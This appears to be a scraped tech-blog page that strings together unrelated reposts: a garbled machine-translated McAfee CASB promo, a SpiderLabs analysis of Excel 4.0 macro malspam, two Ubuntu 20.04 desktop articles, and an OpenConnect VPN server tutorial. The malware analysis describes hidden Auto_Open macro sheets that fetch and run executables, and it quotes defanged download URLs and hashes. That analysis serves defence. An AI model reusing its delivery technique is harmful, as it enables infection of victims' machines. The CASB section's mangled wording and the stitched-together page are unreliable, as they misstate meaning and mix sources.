Category: Latest

Top 3 Data Visualization Capabilities for the CASB Solution

In McAfee’s latest cloud and risk report, 52% of companies said they had the best security in the cloud.  As companies move their most sensitive data to the cloud, they are increasing their investment in CASB solutions to secure that data. Most security decisions generate large amounts of data, and security teams need to analyze this data to quickly obtain information and take corrective action. The visualization capabilities of the CASB solution play an important role in understanding the company’s position in cloud security.

MVISION cloud customers have indicated that data visualization in CASB is very important to support their work. The difficulty for customers was that they did not have the time to export the data to external tools such as Excel and manipulate the data to achieve the required visualization. By providing these capabilities as part of the CASB tool, security teams can save time and gain a better understanding of the security situation in the cloud.

With the latest version of the MVISION Cloud, we’ve provided new and improved visualization capabilities to help customers get the information they need to make security decisions. These capabilities allow not only regular monitoring of key indicators, but also the sharing and visualisation of this information with other stakeholders and safety managers.

  1. Particle size mapping capabilities that provide in-depth information.

CASB offers a variety of statistics for cloud usage, including the number of users, the amount of data uploaded, the number of requests, incoming/outgoing data and authorized/refused requests, DLP incidents, threats, anomalies and more. By providing the right visualization, customers can analyze the data more effectively, perform the necessary analyses and take corrective action. For example, a security administrator may want to understand the top ten categories of cloud services based on the download volume.

Visualisation of services and risks using multiple dimensions

Once this table is available, they may want to understand in detail how many services in these categories have been associated with high, medium or low risk, allowing them to narrow down the categories in which users download most data on high risk services. Another example is understanding the number of incidents in the DLP Office 365 produced by the company’s services. For each of these services, the administrator may determine the seriousness of the incident. Multi-dimensional visualization is the key to analyzing the use of the enterprise cloud to get a quick overview.

  1. Performance monitoring using dashboard maps

Once the CASB administrator has created the required diagrams, he will want to check them regularly. With the MVISION cloud, customers can view their charts on a customizable dashboard, allowing them to explore variations in key statistics. An example of this is a large client of financial services that wants to monitor IaaS resource indicators on a regular basis. This can be a list of AWS, Azure and GCP sources in your organization, or a list of sources that do not meet security requirements, or the number of unresolved incidents in the security configuration.

Dashboard for monitoring IaaS security measures

  1. Share visual information with stakeholders through reports.

Security administrators using CASB solutions work with various stakeholders, including senior management, helpdesk and IT departments, to keep them up to date on key security indicators for the cloud. While most solutions allow periodic export of data to spreadsheets, the ability to export a complete dashboard as a calendar report makes the information much more consumable. An example is the dashboard that shows the most important security measures of Microsoft Office O365, such as unresolved incidents by severity.

Office Incident Report 365 DLP incidents by severity.

As more and more business functions are moved to the cloud, customers now use cloud-based security solutions to protect all their online resources from web traffic, online services, IaaS and container resources. The ability to clearly visualize security measures and obtain the necessary information and fixes is essential to ensure the continuity of asset security in the cloud. While this includes many components and approaches, rich visualization capabilities such as MVISION Cloud help you make the most of your CASB solution and secure your company’s cloud resources.

x3Cimg height=1 width=1 style=display:no src=https://www.facebook.com/tr?id=766537420057144&ev=PageView&noscript=1 />x3C/noscript>’) ;casb wiki,casb microsoft,aws casb,forcepoint casb,casb solution cost,casb mcafee,bitglass casb,palo alto casb

Read More

Excel 4.0 Macro MalSpam Campaigns-The SpiderLabs

Based on the recent blog of my colleague Rodel Mendrez, we looked at last month’s spam using Excel 4.0 macros and found some interesting examples. Both campaigns use a fake calculation theme, and both use the Excel 4.0 macro to download malicious executables.

Example 1: List of hidden Excel 4.0 macros downloaded via web request

Example e-mail 1

Figure 1 : Trustwave Security Email Gateway (SEG), which displays the first spam in Excel 4.0.

In the first spam campaign is an archive with a fake account new_Invoice 0962.xls. Since the fake invoice is an Excel file that follows the Composite Binary File Format (CFBF), we can unpack its threads with 7Zip to get more information about the attachment static.

Recuperated currents

Figure 2 : DocumentSummaryInformation flow of the annex new_Invoice 0962.xls obtained with 7-Zip

The summary information flow in the document indicates that the attachment contains the Excel 4.0 macro. The Excel file consists of 2 sheets: Sheets 1 and 8XoaRgSmhZwAxAOJuv2a. In addition, sheet 1 contains a link to a cell or a series of cells called SzpmQrOQqq4E98Rm40RZ7.

When displaying a workbook data stream, two lines indicate a connection to an external data source – the connection line and the URL hxxps://emmnebuc[…]xyz/SDVJKBsdkhv1.

The workbook flows to Hiew.

Figure 3 : Workbook procedure as shown in Figure 2

The workflow of the workbook follows the specifications of the binary file format (BIFF). Using the BiffView tool, we check the BIFF data in the annex new_Invoice 0962.xls and focus on the data related to the above observations – BOUNDSHEET and DCONN.

There are two BIFF BOUNDSHEETS in the application that contain information about the card. The first record is for Sheet 1, a visible worksheet, and the second record is for 8XoaRgSmhZwAxAOJuv2a, a hidden Excel 4.0 macro sheet.

BIFF entry in the Appendix

Figure 4 : The BIFF BOUNDSHEET records the new_invoice 0962.xls

The BIFF DCONN input stores information about the connections for data transmission. The file new_Invoice 0962.xls has a DCONN number and indicates that Excel will execute the web query as Connection and the corresponding Excel object – Sheet1!SzpmQrOQqq4E98Rm40RZ7.

BIFF-DCONN equipment package

Figure 5 : BIFF DCONN input Excel input attachments

Thanks to the features of new_invoice 0962.xls we can now study more information about the connectivity of macros and data in Microsoft Excel.

Application in MS Excel

Figure 6 : The Show asset record1 option is activated if there is a hidden record.

The Excel Formula tab in the Name Manager of the Excel application has 5 specific names. The first 4 are specific names for the cells of the hidden leaf 8XoaRgSmhZwAxAOJuv2a. The first specific name Auto_Open is used as autostart for the formulas in the macro list. The fifth name refers to the cell area on Sheet 1 and is an Excel object that will be called Web Query.

Specific names

Figure 7 : The Excel object connected to the data connection

Once the data connection parameter is enabled, the web request is executed immediately and its return value is set to Sheet1!$Y$100:$Y$103, the cell range to which the fifth specific name refers.

Formula downloaded via a web request

Figure 8 : The formula is loaded after activating the data link.

The formula obtained using Web Query contains macro functions from Excel 4.0 and therefore does not work in Sheet 1. When macros are enabled, they are copied and finally executed on the Excel 4.0 macro sheet.

Formula on a list of hidden Excel 4.0 macros

Figure 9 : Fill Formula.fill executes the loaded formula in the list of Excel 4.0 macros.

The charged formula serves as a charger for the second step. It loads a DLL of hxxps://emmnebuc[.]xyz/SDKVJBsaduv7, saves it as an html file in a %public% directory and executes it. Since this article was written, the URL is unfortunately no longer available.

Example 2: Downloading highly hidden Excel 4.0 macro sheets

Spam template 2

Figure 9 : SEG displays 2. fake spam on the invoice

In the meantime, an Excel file is added directly to the e-mail in the second spam example. With BiffView, we checked whether Rechnung_372571.xls contains the Excel 4.0 macro.

THE DOUBLE TRAPS

Figure 10 : The BIFF BOUNDHSEET entries of Rechnung_372571.xls received with BiffView.

As with the first spam sample, malicious behavior occurs when using the Excel 4.0 macro list. The list of macros has a very hidden property, so it doesn’t appear in the Fade-in dialog. To display the macro, you must change its BIFF BOUNDHSEET record – the fifth byte of the first record in Figure 10 changes from 02:00 to 00:00.

List of autostart macros

Figure 11 : The file Changed Invoice_372571.xls, which displays the name of the handler, contains only one specific name. Originally there was a very hidden macro sheet when clicking the Auto_Open link.

The list of macros contains a series of RUN functions that start with the reference cell Auto_Open and lead to the execution of the formula in sygfdesy! $CY$375. Ivoice_372571.xls downloads hxxp://paypeted[.]com/esdfrtDERGTYuicvbnTYUv/gspqm[.]exe and runs it under the name C:Intelsgift.exe.

The Excel 4.0 macro leads to a binary

Figure 12 : Macro execution sequence in Excel 4.0

Conclusion

The Excel 4.0 macros were introduced almost 28 years ago, and only a year after their introduction they were overshadowed by the VBA introduced in Excel 5.0. Recently, however, we have noticed that malware writers are making increasing use of this feature, which is still supported in Excel.

Malicious Excel 4.0 macros are more difficult to analyze and detect than VBA macros. VBA macros have their own specific threads, while Excel 4.0 macros are stored in BIFF records in the workbook thread.

Note that these threats will not work if the macros are disabled in the Trust Center settings, just like VBA macros. So if you’re not sure of the confirmation and the source, don’t activate these macros.

IOC

new_invoice 0962.xls (185344 bytes) SHA1 : 16476552B017B61C01152D624F038BBE895E52EE
Invoice_372571.xls (65024 bytes) SHA1 : 96 AE371021192490B5DA7911329ED2DBC837D

Read More

Discover the 20.04 LTS Ubuntu in 20 screenshots

Ubuntu 20.04 logo

Here’s an easy way to sample the changes included in Ubuntu 20.04 without the hassle of having to download and install the distro first!

I’ve went on a screen snapping spree in a fresh copy of the os to collate the following collection of screenshots that showcase some of visible end-user changes in Focal Fossa.

Think of this post as a pack of pre-install spoilers crossed with some pragmatic pre-install promotion

Dive in and take a look!

Ubuntu 20.04 in Screenshots

We start at the Ubiquity installer which, few will be surprised to hear, hasn’t changed dramatically for eons… or is that Eoans?

That said there are a clutch of updated screenshots and rewritten info blurbs, both aimed at letting users know a bit more about the system they’re in the process of installing…

Ubuntu 20.04 Installer Screenshot Ubuntu installer

Once the Ubuntu install completes, and the user reboots as prompted, they’ll be delivered to the revamped login screen which, in this release, boasts a cleaner overall layout:

http://31.220.61.170/wp-content/uploads/2020/05/Discover-Ubuntu-20.04-LTS-in-20-Screenshots.png

The password entry box is now neatly aligned with the user pod, and the ability to ‘password peek’ added. Notably, the session switcher menu has moved to the lower right corner of the screen:

Login Screen The new Ubuntu login screen

The first time anyone logs in to the Ubuntu desktop they are greeted by the welcome wizard. No new pages or options have been added to what previously existed, but the tool remains a solid primer all the same:

Ubuntu 20.04 screenshot: first run wizard. Ubuntu’s welcome tool

Ubuntu 20.04 has a clean and minimal desktop. Only icons for Home and Trash folders are displayed by default (and can be hidden). The Top Bar and Ubuntu Dock neatly frame the brand new ‘Focal Fossa’ mascot wallpaper:

http://31.220.61.170/wp-content/uploads/2020/05/1588274411_236_Discover-Ubuntu-20.04-LTS-in-20-Screenshots.jpg The Ubuntu 20.04 LTS Desktop

Revised versions of Ubuntu’s Yaru GTK and GNOME Shell themes feature, both rebased on upstream versions in Adwaita and GNOME Shell. Eagle-eyed users may spot the odd dash of purple that’s now peppered throughout the UI:

Ubuntu 20.04 screenshot showing purple accents in the UI Yaru theme tweaks

Calendar widget and app notification banners sport a raised, carded look in the Notification Center/message tray applet, a change that’s really helps lift (pun intended) the overall aesthetic:

Ubuntu 20.04 screenshot showing app notification Carded-effect notifications and widgets

Sticking with theme changes for a moment there’s a brand new “dark mode” option available in the Settings > Appearance panel.

Ubuntu 20.04 screenshot showing dark mode New dark mode option

GNOME developers have tweaked the layout of “Authentication Required” dialogs (among others) to improve consistency throughout the UI, i.e. centrally aligned elements, password peek toggle etc:

Ubuntu 20.04 screenshot showing authentication dialog Authentication dialog in Focal

The ability to create custom app folders using drag and drop in the Applications grid was introduced in Ubuntu 19.10 and GNOME 3.34 — but the feature is much improved in this release.

App folders now spawn predictably from the centre of the screen; the icon shuffling animation is less flaky; and it’s easier to edit folder names directly from the folder itself:

Ubuntu 20.04 screenshot showing app folders A custom app folder

Search results displayed in the Applications screen are now easier to read, and are grouped by source:

Search results grouped by source

Those rocking high-resolution displays can enable fractional scaling in Ubuntu 20.04 using the new toggle present in the Settings > Display panel:

Display Settings Fractional scaling options in Focal

Sticking with Settings for a moment, users may appreciate the newly redesigned “About” panel (though may not appreciate the fact that this no longer shows the kernel version):

http://31.220.61.170/wp-content/uploads/2020/05/1588274413_740_Discover-Ubuntu-20.04-LTS-in-20-Screenshots.jpg GNOME 3.36 features a redesigned About pane

Ubuntu’s lock screen no longer requires users to set a separate background for it. Instead the lock screen reuses the desktop wallpaper with a heavy blur applied to it:

Ubuntu 20.04 Screenshot: new lock The new lock screen

There are no major software additions in Ubuntu 20.04 beyond a Snap’d version of Ubuntu Software by default (but those who want to install Flatpak apps will need to install the repo version instead):

ubuntu 20.04 has a new Snap Ubuntu Software app Snap’d Ubuntu Software

Snap versions of Calculator, Characters, and Logs have been removed the default installed and replaced with the respective repo versions:

ubuntu 20.04 characters and logs applications The Logs and Characters apps

The latest versions of Mozilla Firefox, LibreOffice, and Thunderbird comes as standard:

ubuntu 20.04 firefox libreoffice app screenshot Firefox 75 and LibreOffice 6.4

And there are new versions of other core open source apps, like Calendar, To-Do and the Shotwell photo manager:

ubuntu 20.04 Shotwell, calendar and To do app screenshot Shotwell, Calendar and the To Do app

GNOME 3.36, around which Ubuntu 20.04 LTS sits, does deliver a new “Suspend” option in the Status Menu:

ubuntu 20.04 screenshot showing the new suspend option Visible suspend option

Finally, the power off dialog is (like other dialogs in this release) is now centre-aligned:

ubuntu 20.04 screenshot showing power dialog in gnome shell C YA

Read More

How to Enable Full Dark Mode for Ubuntu 20.04 LTS

http://31.220.61.170/wp-content/uploads/2020/04/How-to-Enable-Full-Dark-Mode-in-Ubuntu-20.04-LTS.jpg

Ubuntu 20.04 ships with a new dark theme option, but some users don’t think the feature goes far enough.

So in this guide I show you how to change the GNOME Shell theme in Ubuntu 20.04 LTS to Yaru Dark. This simple step gives you a more complete ‘dark mode’ experience throughout the whole Ubuntu desktop UI.

But why is a tutorial on this needed at all?

Well…

Ubuntu’s New Dark Theme

As you probably know by now Ubuntu 20.04 makes it very easy change the look and feel of “window colours” directly from the Settings > Appearance app.

Three window colour choices are offered here: light, standard, and dark:

It’s a great feature, one I was particularly pleased to see Ubuntu add.

The “problem” stems from the factor that the new ‘Dark’ setting only changes the look and feel of apps that run on the desktop. It does not change the colour of the desktop UI itself.

Instead, the GNOME Shell UI continues to use a light theme, regardless of which window colour preference you’ve picked:

Ubuntu Dark theme but light shell

It doesn’t look terrible but it’s not quite the full dark theme experience that some users are after.

So I’m pleased to say you can change it — and here’s how.

How to Make GNOME Shell Dark in 20.04

First, you’re going to need to install the User Themes GNOME Shell extension. This add-on lets you to change GNOME Shell theme incredibly easily.

You can install this particular power-up from the extensions.gnome.org (EGO) website but I find it quicker to just install the gnome-shell-extensions package (warning: it adds lots of other add-ons too) straight from the Ubuntu archives, no browser required:

Click to the GNOME Extensions Bundle

Alternatively, you can run this command to install the User Themes GNOME extension on Ubuntu from the command line:

sudo apt install gnome-shell-extensions

Whatever way you choose to install the User Themes extension you are going to need both the (new) GNOME Extensions app and GNOME Tweaks to take advantage of it:

Click to install GNOME Tweaks on Ubuntu

Click to install GNOME Extensions App on Ubuntu

I don’t have a fresh install to test but it might be the case that the ‘new’ Extensions preferences app doesn’t need to be installed manually. It might enabled as soon as you install an extension — just look for it in the Applications grid:

http://31.220.61.170/wp-content/uploads/2020/04/1588262961_574_How-to-Enable-Full-Dark-Mode-in-Ubuntu-20.04-LTS.jpg

Now you’re all set!

  • Open GNOME Extensions app
  • Slide the toggle next to ‘User Themes’ to on (coloured)

Just like in this picture:

Enable User Themes Extension

Then you need to log out and back in to your session OR manually restart GNOME Shell (Alt + F2, type r, hit enter) for the theming extension to actually be activated.

Lastly, open the GNOME Tweaks tool and:

  • Select ‘Appearance’ in the sidebar
  • Locate the Shell section
  • Select ‘Yaru Dark’ from the menu adjacent

Refer to this screenshot if you need help:

Enable Yaru Dark theme in GNOME Tweaks

That’s all you need to do. Your desktop is now fully dark in ALL areas!

full dark mode

If you get bored of the dark look — impossible, true me — and want to switch back to the standard ‘light’ look for GNOME Shell UI elements just repeat the last set of steps again, but choose ‘Default’ in place of ‘Yaru Dark’.

Do you prefer light or dark Shell themes? Let me know below

Thanks to everyone who sent this tip inubuntu 20.04 dark theme,ubuntu theme

Read More

Set OpenConnect VPN Server (ocserv) to Ubuntu 20.04 with Let’s Encrypt

This tutorial is going to show you how to run your own VPN server by installing OpenConnect VPN server on Ubuntu 20.04. OpenConnect VPN server, aka ocserv, is an open-source implementation of Cisco AnyConnnect VPN protocol, which is widely used in businesses and universities. AnyConnect is an SSL-based VPN protocol that allows individual users to connect to a remote network.

Why Set Up Your Own VPN Server?

  • Maybe you are a VPN service provider or a system administrator, which behooves you to set up our own VPN server.
  • You don’t trust the no-logging policy of VPN service providers, so you go the self-host route.
  • You can use VPN to implement network security policy. For example, if you run your own email server, you can require users to log in only from the IP address of the VPN server by creating an IP address whitelist in the firewall. Thus, your email server is hardened to prevent hacking activities.
  • Perhaps you are just curious to know how VPN server works.

Set Up OpenConnect VPN Server (ocserv) on Ubuntu 20.04

Features of OpenConnect VPN Server

  • Lightweight and fast. In my test, I can watch YouTube 4K videos with OpenConnect VPN. YouTube is blocked in my country (China).
  • Runs on Linux and most BSD servers.
  • Compatible with Cisco AnyConnect client
  • There are OpenConnect client software for Linux, MacOS, Windows and OpenWRT. For Android and iOS, you can use the Cisco AnyConnect Client.
  • Supports password authentication and certificate authentication
  • Supports RADIUS accounting.
  • Easy to set up

I particularly like the fact that compared to other VPN technologies, it is very easy and convenient for the end-user to use OpenConnect VPN. Whenever I install a Linux distro on my computer and want to quickly unblock websites or hide my IP address, I install OpenConnect client and connect to the server with just two lines of commands:

sudo apt install openconnect

sudo openconnect -b vpn.mydomain.com

There is also OpenConnect VPN client for Fedora, RHEL, CentOS, Arch Linux and OpenSUSE. You can easily install it with your package manager.

sudo dnf install openconnect
sudo yum install openconnect
sudo pacman -S openconnect

Prerequisites

To follow this tutorial, you will need a VPS (Virtual Private Server) that can access blocked websites freely (Outside of your country or Internet filtering system). I recommend Vultr VPS (This is my referral link. You can get $50 free credit by creating an account at Vultr via my referral link). They offer 512M memory high-performance KVM VPS for just $2.5 per month, which is perfect for your private VPN server. Once you have a VPS, install Ubuntu 20.04 on it and follow the instructions below.

You also need a domain name. I registered my domain name from NameCheap because the price is low and they give whois privacy protection free for life.

Update: The new Vultr $2.5/month plan includes IPv6 address only. You can select the $3.5/month plan at the New York (NJ) data center to have both IPv4 and IPv6 addresses.

Step 1: Install OpenConnect VPN Server on Ubuntu 20.04

Log into your Ubuntu 20.04 server. Then use apt to install the ocserv package from the default Ubuntu repository.

sudo apt update
sudo apt install ocserv

Once installed, the OpenConnect VPN server is automatically started. You can check its status with:

systemctl status ocserv

Sample output:

● ocserv.service – OpenConnect SSL VPN server
Loaded: loaded (/lib/systemd/system/ocserv.service; enabled; vendor preset: enabled)
Active: active (running) since Sun 2020-04-12 19:57:08 HKT; 12s ago
Docs: man:ocserv(8)
Main PID: 216409 (ocserv-main)
Tasks: 2 (limit: 9451)
Memory: 1.6M
CGroup: /system.slice/ocserv.service
├─216409 ocserv-main
└─216429 ocserv-sm

Hint: If the above command doesn’t quit immediately, you can press the Q key to gain back control of the terminal.

If it’s not running, then you can start it with:

sudo systemctl start ocserv

By default OpenConnect VPN server listens on TCP and UDP port 443. If it’s being used by web server, then the VPN server would probably fail to start. We will see how to change the port in OpenConnect VPN configuration file later.

If there’s a firewall running on your server, then you will need to open port 80 and 443. For example, if you use UFW, then run the following command.

sudo ufw allow 80,443/tcp

Step 2: Install Let’s Encrypt Client (Certbot) on Ubuntu 20.04 Server

The gnutls-bin package installed along with ocserv provides tools to create your own CA and server certificate, but we will obtain and install Let’s Encrypt certificate. The advantage of using Let’s Encrypt certificate is that it’s free, easier to set up and trusted by VPN client software.

Run the following commands to install Let’s Encrypt client (certbot) from the default Ubuntu repository.

sudo apt install certbot

To check the version number, run

certbot –version

Sample output:

certbot 0.40.0

Step 3: Obtain a Trusted TLS Certificate from Let’s Encrypt

I recommend using the standalone or webroot plugin to obtain TLS certificate for ocserv.

Standalone Plugin

If there’s no web server running on your Ubuntu 20.04 server and you want OpenConnect VPN server to use port 443, then you can use the standalone plugin to obtain TLS certificate from Let’s Encrypt. Run the following command. Don’t forget to set A record for your domain name.

sudo certbot certonly –standalone –preferred-challenges http –agree-tos –email [email protected] -d vpn.example.com

Where:

  • certonly: Obtain a certificate but don’t install it.
  • –standalone: Use the standalone plugin to obtain a certificate
  • –preferred-challenges http: Perform http-01 challenge to validate our domain, which will use port 80.
  • –agree-tos: Agree to Let’s Encrypt terms of service.
  • –email: Email address is used for account registration and recovery.
  • -d: Specify your domain name.

As you can see the from the following screenshot, I successfully obtained the certificate.

ocserv ubuntu 20.04 letsencrypt certbot

Using webroot Plugin

If your Ubuntu 20.04 server has a web server listening on port 80 and 443, then it’s a good idea to use the webroot plugin to obtain a certificate because the webroot plugin works with pretty much every web server and we don’t need to install the certificate in the web server.

First, you need to create a virtual host for vpn.example.com.

Apache

If you are using Apache, then

sudo nano /etc/apache2/sites-available/vpn.example.com.conf

And paste the following lines into the file.

ServerName vpn.example.com

DocumentRoot /var/www/ocserv

Save and close the file. Then create the web root directory.

sudo mkdir /var/www/ocserv

Set www-data (Apache user) as the owner of the web root.

sudo chown www-data:www-data /var/www/ocserv -R

Enable this virtual host.

sudo a2ensite vpn.example.com

Reload Apache for the changes to take effect.

sudo systemctl reload apache2

Once virtual host is created and enabled, run the following command to obtain Let’s Encrypt certificate using webroot plugin.

sudo certbot certonly –webroot –agree-tos –email [email protected] -d vpn.example.com -w /var/www/ocserv

Nginx

If you are using Nginx, then

sudo nano /etc/nginx/conf.d/vpn.example.com.conf

Paste the following lines into the file.

server {
listen 80;
server_name vpn.example.com;

root /var/www/ocserv/;

location ~ /.well-known/acme-challenge {
allow all;
}
}

Save and close the file. Then create the web root directory.

sudo mkdir -p /var/www/ocserv

Set www-data (Nginx user) as the owner of the web root.

sudo chown www-data:www-data /var/www/ocserv -R

Reload Nginx for the changes to take effect.

sudo systemctl reload nginx

Once virtual host is created and enabled, run the following command to obtain Let’s Encrypt certificate using webroot plugin.

sudo certbot certonly –webroot –agree-tos –email [email protected] -d vpn.example.com -w /var/www/ocserv

Step 4: Edit OpenConnect VPN Server Configuration File

Edit ocserv main configuration file.

sudo nano /etc/ocserv/ocserv.conf

First, we need to configure password authentication. By default, password authentication through PAM (Pluggable Authentication Modules) is enabled, which allows you to use Ubuntu system accounts to login from VPN clients. This behavior can be disabled by commenting out the following line.

auth = “pam[gid-min=1000]”

If we want users to use separate VPN accounts instead of system accounts to login, we need to add the following line to enable password authentication with a password file.

auth = “plain[passwd=/etc/ocserv/ocpasswd]”

After finishing editing this config file, we will see how to use ocpasswd tool to generate the /etc/ocserv/ocpasswd file, which contains a list of usernames and encoded passwords.

Note: Ocserv supports client certificate authentication, but Let’s Encrypt does not issue client certificate. You need to set up your own CA to issue client certificate.

Next, if you don’t want ocserv to use TCP and UDP port 443, then find the following two lines and change the port number. Otherwise leave them alone.

tcp-port = 443
udp-port = 443

Then find the following two lines. We need to change them.

server-cert = /etc/ssl/certs/ssl-cert-snakeoil.pem
server-key = /etc/ssl/private/ssl-cert-snakeoil.key

Replace the default setting with the path of Let’s Encrypt server certificate and server key file.

server-cert = /etc/letsencrypt/live/vpn.example.com/fullchain.pem
server-key = /etc/letsencrypt/live/vpn.example.com/privkey.pem

Then, set the maximal number of clients. Default is 128. Set to zero for unlimited.

max-clients = 128

Set the number of devices a user is able to login from at the same time. Default is 2. Set to zero for unlimited.

max-same-clients = 2

Next, find the following line. Change false to true to enable MTU discovery, which can optimize VPN performance.

try-mtu-discovery = false

You can set the time that a client is allowed to stay idle before being disconnected via the following two parameters. If you prefer the client to stay connected indefinitely, then comment out these two parameters.

idle-timeout=1200
mobile-idle-timeout=1800

After that, set the default domain to vpn.example.com.

default-domain = vpn.example.com

The IPv4 network configuration is as follows by default. This will cause problems because many home routers also set the IPv4 network range to 192.168.1.0/24.

ipv4-network = 192.168.1.0
ipv4-netmask = 255.255.255.0

We can use another private IP address range (10.10.10.0/24) to avoid IP address collision, so change the value of ipv4-network to

ipv4-network = 10.10.10.0

Now uncomment the following line to tunnel all DNS queries via the VPN.

tunnel-all-dns = true

The default DNS resolver addresses are as follows, which is fine.

dns = 8.8.8.8
dns = 1.1.1.1

Note: If you are a VPN service provider, then it’s a good practice to run your own DNS resolver on the same server. If there’s a DNS resolver running on the same server, then specify the DNS as

dns = 10.10.10.1

10.10.10.1 is the IP address of OpenConnect VPN server in the VPN LAN. This will speed up DNS lookups a little bit for clients because the network latency between the VPN server and the DNS resolver is eliminated.

Then comment out all the route parameters (add # symbol at the beginning of the following four lines), which will set the server as the default gateway for the clients.

route = 10.0.0.0/8
route = 172.16.0.0/12
route = 192.168.0.0/16

no-route = 192.168.5.0/255.255.255.0

Save and close the file  Then restart the VPN server for the changes to take effect.

sudo systemctl restart ocserv

Step 5: Create VPN Accounts

Now use the ocpasswd tool to generate VPN accounts.

sudo ocpasswd -c /etc/ocserv/ocpasswd username

You will be asked to set a password for the user and the information will be saved to /etc/ocserv/ocpasswd file. To reset password, simply run the above command again.

Step 6: Enable IP Forwarding

In order for the VPN server to route packets between VPN clients and the Internet, we need to enable IP forwarding. Edit sysctl.conf file.

sudo nano /etc/sysctl.conf

Add the following line at the end of this file.

net.ipv4.ip_forward = 1

Save and close the file. Then apply the changes with the below command. The -p option will load sysctl settings from /etc/sysctl.conf file. This command will preserve our changes across system reboots.

sudo sysctl -p

Step 7: Configure IP Masquerading in Firewall

We need to set up IP masquerading in the server firewall, so that the server becomes a virtual router for VPN clients. I will use UFW, which is a front end to the iptables firewall. Install UFW on Ubuntu with:

sudo apt install ufw

First, you need to allow SSH traffic.

sudo ufw allow 22/tcp

Then edit /etc/default/ufw file.

sudo nano /etc/default/ufw

Change the default forward policy from “DROP” to “ACCEPT”.

DEFAULT_FORWARD_POLICY=”ACCEPT”

Save and close the file. Next, find the name of your server’s main network interface.

ip addr

As you can see, it’s named ens3 on my Ubuntu server.

openconnect-ubuntu 20.04-command-line

To configure IP masquerading, we have to add iptables command in a UFW configuration file.

sudo nano /etc/ufw/before.rules

By default, there are some rules for the filter table. Add the following lines at the end of this file. Replace ens3 with your own network interface name.

# NAT table rules
*nat
:POSTROUTING ACCEPT [0:0] -A POSTROUTING -o ens3 -j MASQUERADE

# End each table with the ‘COMMIT’ line or these rules won’t be processed
COMMIT

In Nano text editor, you can go to the end of the file by pressing Ctrl+W, then pressing Ctrl+V.

The above lines will append (-A) a rule to the end of of POSTROUTING chain of nat table. It will link your virtual private network with the Internet. And also hide your network from the outside world. So the Internet can only see your VPN server’s IP, but can’t see your VPN client’s IP, just like your home router hides your private home network.

Save and close the file. Then enable UFW.

sudo ufw enable

If you have enabled UFW before, then you can use systemctl to restart UFW.

sudo systemctl restart ufw

Now if you list the rules in the POSTROUTING chain of the NAT table by using the following command:

sudo iptables -t nat -L POSTROUTING

You can see the Masquerade rule.

ocserv-IP-Masquerading-ufw-ubuntu-20.04

Step 8: Open Port 443 in Firewall

Run the following command to open TCP and UDP port 443. If you configured a different port for ocserv, then change 443 to your configured port.

sudo ufw allow 443/tcp
sudo ufw allow 443/udp

Now OpenConnect VPN server is ready to accept client connections.

For those of you who run a local DNS resolver, if you specified 10.10.10.1 as the DNS server for VPN clients, then you must allow VPN clients to connect to port 53 with the following UFW rule.

sudo ufw insert 1 allow in from 10.10.10.0/24

You also need to edit the BIND DNS server’s configuration to allow VPN clients to send recursive DNS queries like below.

allow-recursion { 127.0.0.1; 10.10.10.0/24; };

How to Install and Use OpenConnect VPN client on Ubuntu 20.04 Desktop

Run the following command to install OpenConnect VPN command line client on Ubuntu desktop.

sudo apt install openconnect

You can Connect to VPN from the command line like below. -b flag will make it run in the background after connection is established.

sudo openconnect -b vpn.example.com:port-number

You will be asked to enter VPN username and password. If connection is successfully established, you will see the following message.

Got CONNECT response: HTTP/1.1 200 CONNECTED
CSTP connected. DPD 90, Keepalive 32400
Connected tun0 as 192.168.1.139, using SSL
Established DTLS connection (using GnuTLS). Ciphersuite (DTLS1.2)-(RSA)-(AES-256-GCM).

To stop the connection, run:

sudo pkill openconnect

To run the client non-interactively, use the following syntax.

echo -n password | sudo openconnect -b vpn.example.com -u username –passwd-on-stdin

If you want to use Network Manager to manage VPN connection, then you also need to install these packages.

sudo apt install network-manager-openconnect network-manager-openconnect-gnome

If you are successfully connected to the VPN server, but your public IP address doesn’t change, that’s because IP forwarding or IP masquerading is not working. I once had a typo in my iptables command, which caused my computer not being able to browse the Internet.

Auto-Connect on System Startup

To let OpenConnect VPN client automatically connect to the server at boot time, we can create a systemd service unit.

sudo nano /etc/systemd/system/openconnect.service

Put the following lines to the file. Replace the red text.

[Unit] Description=OpenConnect VPN Client
After=network-online.target
Wants=network-online.target

[Service] Type=simple
ExecStart=/bin/bash -c ‘/bin/echo -n password | /usr/sbin/openconnect vpn.example.com -u username –passwd-on-stdin’
KillSignal=SIGINT
Restart=always
RestartSec=2

[Install] WantedBy=multi-user.target

Save and close the file. Then enable this service so that it will start at boot time.

sudo systemctl enable openconnect.service

Explanation of the file content:

  • After=network-online.target and Wants=network-online.target make this service run after network is up.
  • In reality, this service can still run before network is up. We add Restart=always and RestartSec=2 to restart this service after 2 seconds if this service fails.
  • Systemd doesn’t recognise pipe redirection, so in the ExecStart directive, we wrap the comand in single quotes and run it with the Bash shell.
  • Since OpenConnect VPN client will run as a systemd service, which runs in the background, there’s no need to add -b flag to the openconnect command.
  • The KillSignal directive tells Systemd to send the SIGINT signal when the systemctl stop openconnect command is issued. This will performs a clean shutdown by logging the session off, and restoring DNS server settings and the Linux kernel routing table.

To start this Systemd service immediately, run

sudo systemctl start openconnect

To stop this Systemd service, run

sudo systemctl stop openconnect

OpenConnect GUI Client for Windows and MacOS

They can be downloaded from OpenConnect GUI Github Page.

Speed

OpenConnect VPN is pretty fast. I can use it to watch 4k videos on YouTube.

ocserv letsencrypt

Auto-Renew Let’s Encrypt Certificate

Edit root user’s crontab file.

sudo crontab -e

Add the following line at the end of the file. It’s necessary to reload ocserv service for the VPN server to pick up new certificate and key file.

@daily certbot renew –quiet && systemctl reload ocserv

Optimization

OpenConnect by default uses TLS over UDP protocol (DTLS) to achieve faster speed, but UDP can’t provide reliable transmission. TCP is slower than UDP but can provide reliable transmission. One optimization tip I can give you is to disable DTLS, use standard TLS (over TCP), then enable TCP BBR to boost TCP speed.

To disable DTLS, comment out (add # symbol at the beginning) the following line in ocserv configuration file.

udp-port = 443

Save and close the file. Then restart ocserv service.

sudo systemctl restart ocserv.service

To enable TCP BBR, please check out the following tutorial.

In my test, standard TLS with TCP BBR enabled is two times faster than DTLS.

Troubleshooting

Note that if you are using OpenVZ VPS, make sure you enable the TUN virtual networking device in VPS control panel. (If you use Vultr VPS, then you have KVM-based VPS, so you don’t have to worry about this.)

If you encounter any problem, then check OpenConnect VPN server log.

sudo journalctl -eu ocserv.service

I found that if I change port 443 to a different port, the great firewall of China will block this VPN connection.

Make OpenConnect VPN server and web server use port 443 at the same time

